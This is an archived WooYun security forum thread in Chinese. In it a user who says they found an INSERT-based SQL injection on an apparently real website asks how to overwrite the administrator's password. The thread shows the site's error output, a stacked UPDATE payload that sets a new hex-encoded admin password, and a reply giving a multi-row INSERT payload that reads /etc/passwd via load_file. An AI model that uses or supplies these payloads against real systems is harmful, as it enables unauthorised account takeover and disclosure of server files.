当前位置:WooYun(白帽子技术社区) >> SQL Injection >> INSERT INTO 注入构造UPDATE求助

INSERT INTO 注入构造UPDATE求助

悬赏 5 WB(已解决)
苦咖啡 | 2015-09-30 18:02

注入某网站  发现insert into存在注入   已经爆出了管理员账号和密码  但是。。。。悲剧的发现解密不开,构造了几次update都发现失败了。。。。   求大牛帮助


可控变量  hack-sql-test  加入单引号报错

Database Query Error Info:

Invalid SQL: INSERT INTO test_guest (guestip, browser, lang, created, isonline, isbanned, serverid, fromurl) VALUES ('127.0.0.1', 'Chrome 42.0.2311.152', '1', '1443607129', 0, 0, '6', 'hack-sql-test'')

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''hack-sql-test'')' at line 1
Error No:
File: /enter.php

分享到:
23 个回复
  1. 1#
    回复此人 感谢
    ′ 雨。 | 2015-09-30 18:42

    mysql query?

    楼主成功了一定要@我一下,

  2. 2#
    回复此人 感谢
    ′ 雨。 | 2015-09-30 18:44

    wb给我算了,mysql query基本是不支持多行的。 目测你这个就不支持多行, insert里就没办法update

  3. 3#
    回复此人 感谢
    刘海哥 (‮moc.ghuil.www) | 2015-09-30 19:05

    其实给我我返一半!

  4. 4#
    回复此人 感谢
    好基友一辈子 | 2015-10-01 08:17

    其实是不行的,讨论很多次了,当然也有大牛发文章说的很有道理,只是我没遇到http://zone.wooyun.org/content/50

  5. 5#
    回复此人 感谢
    xsser (十根阳具有长短!!) | 2015-10-01 10:39

    如果注射发生在用户表有点办法

  6. 6#
    回复此人 感谢
    苦咖啡 | 2015-10-01 12:41

    @xsser 注射发生在访问记录表。。。

  7. 7#
    回复此人 感谢
    苦咖啡 | 2015-10-01 12:42

    @′  雨。 昨天有点神奇 我本地搭建环境  有那么几次成功了 然后就是一直失败。。。

  8. 8#
    回复此人 感谢
    苦咖啡 | 2015-10-01 12:48

    );UPDATE welive_user SET password=0x6339353332363730336434393263626139656336333763366339636463313537 where username=0x61646d696e20;/**    这样他给我当文本处理存储了。。。。




    ');UPDATE welive_user SET password=0x6339353332363730336434393263626139656336333763366339636463313537 where username=0x61646d696e20;/**  这样在SQL执行无错。。。。但是在注入中  会提示语句错误  我就纳闷了、、、

  9. 9#
    回复此人 感谢
    苦咖啡 | 2015-10-01 17:22

    另类方法成功解决哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈
    太神奇了。。。。。

  10. 10#
    回复此人 感谢
    mramydnei | 2015-10-01 20:34

    @苦咖啡 然而你悬赏的wb还是会被扣掉。是漏洞环境支持多行执行么?

  11. 11#
    回复此人 感谢
    wooOver | 2015-10-01 21:15

    @苦咖啡 什么办法?说来膜拜一下!

  12. 12#
    回复此人 感谢
    刘海哥 (‮moc.ghuil.www) | 2015-10-02 00:56

    @苦咖啡 然而你悬赏的wb还是会被扣掉。是漏洞环境支持多行执行么?

  13. 13#
    回复此人 感谢
    明月影 | 2015-10-04 17:21

    WY0}H%{9Y$}3OCDWV))}EBJ.png
    执行语句还请说明。方便做测试。
    C1O]0I1P)0{RV@M685XN$MA.png
    希望有帮助。

  14. 14#
    回复此人 感谢
    Nullun (‮nullun‮) | 2015-10-05 01:23

    顶wb

  15. 15#
    回复此人 感谢
    苦咖啡 | 2015-10-05 16:56

    @wooOver session不过期。。。。直接从数据库读取

  16. 16#
    回复此人 感谢
    苦咖啡 | 2015-10-05 16:57

    @mramydnei 好像不是、、、

  17. 17#
    回复此人 感谢
    BMa (web应用安全,更重要的是业务实现逻辑!) | 2015-10-13 16:06

    @苦咖啡 @苦咖啡 什么方法?

  18. 18#
    回复此人 感谢
    boooooom | 2015-10-13 17:16

    insert 拼接多条插入,这样就可以控制后面字段的插入,再用select 查询其他数据字段的数据插入某个可见字段。

  19. 19#
    回复此人 感谢
    boooooom | 2015-10-13 17:17

    INSERT INTO test_guest (guestip, browser, lang, created, isonline, isbanned, serverid, fromurl) VALUES ('127.0.0.1', 'Chrome 42.0.2311.152', '1', '1443607129', 0, 0, '6', 'hack-sql-test'),('127.0.0.1', (select load_file('/etc/passwd')), '1', '1443607129', 0, 0, '6', 'hack-sql-test')

  20. 20#
    回复此人 感谢
    Vigoss_Z (http://i-security.cc) | 2015-10-13 20:12

    @boooooom 审题有问题,lz在insert的注入点下要直接update数据。

  21. 21#
    回复此人 感谢
    boooooom | 2015-10-14 11:40

    @Vigoss_Z 0.0

  22. 22#
    回复此人 感谢
    啊L川 (我想起那天下午夕阳下的奔跑,那是我逝去的青春...) | 2015-10-14 11:42

    0.0

  23. 23#
    回复此人 感谢
    马丁 (我快要饿死了!!!!) | 2015-10-30 00:30

    @苦咖啡 求方法

添加新回复

登录 后才能参与评论.

WooYun(白帽子技术社区)

网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地

登录

其它内容


Copyright © 2010 www.wooyun.org All Rights Reserved. 吉ICP备12001400号-1